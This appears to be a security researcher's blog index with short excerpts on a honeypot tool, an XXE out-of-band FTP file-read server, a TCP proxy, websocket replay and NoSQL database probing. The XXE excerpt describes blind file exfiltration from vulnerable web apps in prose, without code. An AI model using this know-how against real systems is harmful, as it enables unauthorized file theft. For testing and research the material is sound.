metatrapd - Metadata and honeypots

Using a honeypot/honeyservice/honeytoken is one of the simplest and most impactful security actions one can take. Thinkst Canary has proven this over a number of years and continues to lead the field. Taking inspiration from what Thinkst has done and combining this with their idea of “honey tokens” for cloud services, I wrote metatrapd a couple of years back. Finally I’m making this public, maybe it will be useful to someone....

January 4, 2024 · 3 min · 516 words · Etienne Stalmans

XXE FTP Server - A {web,ftp}-server for XXE

XXE - FTP OoB basics XXE offers a great attack avenue for reading files from a vulnerable web-app. One of my favourite XXE attacks involves protocol handler abuse, where you use FTP to do an out of band read. This is useful in those cases where you have XXE but it is blind. Unlike the normal OoB retreival through HTTP, FTP works with newer versions of Java (>1.7) and there are fewer characters which break the retrieval....

December 11, 2016 · 3 min · 567 words · Etienne Stalmans

tcpprox - An intercepting TCP proxy

On numerous occasions I’ve run into custom binary network protocols that I’ve wanted to reverse. The usual goto here is to fireup wireshark/tcpdump and view the traffic as it goes accross the wire. This works really well in most cases, but how about traffic that uses TLS to encrypt the traffic? Unless you have the private key for the server, you are stuck with viewing encrypted traffic in wireshark. Not ideal for reverse engineering....

December 11, 2016 · 7 min · 1329 words · Etienne Stalmans

Viewing, modifying and replaying websockets

A few assessments back I ran into a web app that made libral use of websockets. Now it’s been a while since encountering an app that makes use of websockets for such a large portion of it’s content and I’d forgotten what a PITA it can be trying to intercept and replay websocket requests. Seeing as it was a web app assessment I naturally turned to trusty Burp Suite Pro. Burp has supported websockets for a long while now, but far as I could find, this support only allowed you to intercept websocket requests and view/modify them....

September 10, 2015 · 2 min · 320 words · Etienne Stalmans

Hipsters and data

A while back I spent some time playing with the “modern” database implementations, more affectionately known as hipster tech. These are mostly your so-called NoSQL, big-data, ect databases. Trying to interact with these databases required numerous scripts to be written, one for each database implementation. After chatting to @PaulWebSec I decided to merge these into a single tool. Thus HippyDB Tool was born. The following databases are supported: Aerospike Cassandra Hbase Hive Memcached Mongodb Redis Riak A quick scan of AWS and Google Cloud hosting showed that the vast majority of these databases are deployed on default ports, listening on all interfaces and most critically, without any authentication....

June 14, 2015 · 2 min · 377 words · Etienne Stalmans